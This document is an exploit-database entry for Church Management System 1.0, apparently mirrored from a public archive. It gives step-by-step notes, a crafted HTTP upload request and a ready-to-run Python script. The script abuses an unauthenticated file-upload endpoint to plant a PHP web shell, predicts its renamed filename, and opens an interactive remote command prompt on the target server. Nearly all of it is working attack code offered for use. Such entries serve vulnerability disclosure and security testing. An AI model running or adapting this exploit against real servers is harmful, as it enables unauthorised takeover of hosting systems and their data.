Church Management System 1.0 Exploit, Remote Code Execution (RCE) (Unauthenticated)

# Exploit Title: Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-20
# Vendor Homepage: https://www.sourcecodester.com/php/14949/church-management-system-cms-website-using-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/church_management_1.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Church Management System (CMS-Website) 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

# Exploit Details:

# 1. Access the 'classes/Users.php', as it does not check for an authenticated user session.
# 2. Set the 'f' parameter of the POST request to 'save'.
#     - `Users.php?f=save`
# 3. Capture request in burp and replace with with following request.
'''
POST /church_management/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------91105564325608762312322546550
Content-Length: 859
Origin: http://localhost
Connection: close
Referer: http://localhost/church_management/admin/?page=user
Cookie: PHPSESSID=nbt4d6o8udue0v82bvasfjkm90
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="id"

1
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="firstname"

Adminstrator
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="lastname"

Admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="username"

admin
-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="password"


-----------------------------91105564325608762312322546550
Content-Disposition: form-data; name="img"; filename="phpinfo.php"
Content-Type: application/octet-stream

<?php echo phpinfo(); ?>
-----------------------------91105564325608762312322546550--

'''
#   ` Image uploader is renaming your payload using the following function.
         # strtotime(date('y-m-d H:i')).'_'.$_FILES['img']['name'];
         # you can simply go to any online php compile website like https://www.w3schools.com/php/phptryit.asp?filename=tryphp_compiler
         # and print this function to get the value. e.g: <?php echo strtotime(date('y-m-d H:i')); ?> Output: 1632085200
         # concate output with your playload name like this 1632085200_phpinfo.php
# 4. Communicate with the webshell at 'uploads/1632085200_phpinfo.php?cmd=dir' using GET Requests.

# RCE via executing exploit:
    # Step 1: run the exploit in python with this command: python3 CMS-RCEv1.0.py
    # Step 2: Input the URL of the vulnerable application: Example: http://localhost/church_management/


import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

header = Style.BRIGHT+Fore.RED+'              '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL

print(Style.BRIGHT+"               Church Management System v1.0")
print(Style.BRIGHT+"            Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)

print(r"""


                                                                                 .----------.
                                                                 .-''-.         /          /
     .                            __  __   ___                 .' .-.  )       /   ______.'
   .'|                           |  |/  `.'   `.              / .'  / /       /   /_
 .'  |                           |   .-.  .-.   '            (_/   / /       /      '''--.
<    |            __        __   |  |  |  |  |  | ,.----------.   / /       '___          `.
 |   | ____    .:--.'.   .:--.'. |  |  |  |  |  |//            \ / /            `'.         |
 |   | \ .'   / |   \ | / |   \ ||  |  |  |  |  |\\            /. '                )        |
 |   |/  .    `" __ | | `" __ | ||  |  |  |  |  | `'----------'/ /    _.-')......-'        /
 |    /\  \    .'.''| |  .'.''| ||__|  |__|  |__|            .' '  _.'.-'' \          _..'`
 |   |  \  \  / /   | |_/ /   | |_                          /  /.-'_.'      '------'''
 '    \  \  \ \ \._,\ '/\ \._,\ '/                         /    _.'
'------'  '---'`--'  `"  `--'  `"                         ( _.-'

                            abdullahkhawaja.com
            """)



GREEN =  '\033[32m' # Green Text
RED =  '\033[31m' # Red Text
RESET = '\033[m' # reset to the defaults
#Create a new session
#proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}



s = requests.Session()



#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK=input("Enter URL of The Vulnarable Application : ")


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK+'uploads/'+filename
        getdir  = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print (Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell

phpshell  = {
               'img':
                  (
                   'shell.php',
                   '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
                   'application/octet-stream',
                  {'Content-Disposition': 'form-data'}
                  )
             }

# Defining value for form data
data = {'id':'1', 'firstname':'Adminstrator', 'lastname':'Admin','username':'admin','password':''}


def id_generator():
    x = datetime.datetime.now()
    date_string = x.strftime("%y-%m-%d %H:%M")
    date = datetime.datetime.strptime(date_string, "%y-%m-%d %H:%M")
    timestamp = datetime.datetime.timestamp(date)
    file = int(timestamp)
    final_name = str(file)+'_shell.php'
    return final_name

filename = id_generator()
#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
upload = s.post(LINK+'classes/Users.php?f=save', cookies=cookies, files=phpshell, data=data)

shell_upload = True if("Undefined index: id in" in upload.text) else False
u=shell_upload
if u:
	print(GREEN+"[+]PHP Shell has been uploaded successfully!", RESET)
else:
	print(RED+"[-]Failed To Upload The PHP Shell!", RESET)



#Executing The Webshell
webshell(LINK, s)

All rights reserved nPulse.net 2009 - 2021
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD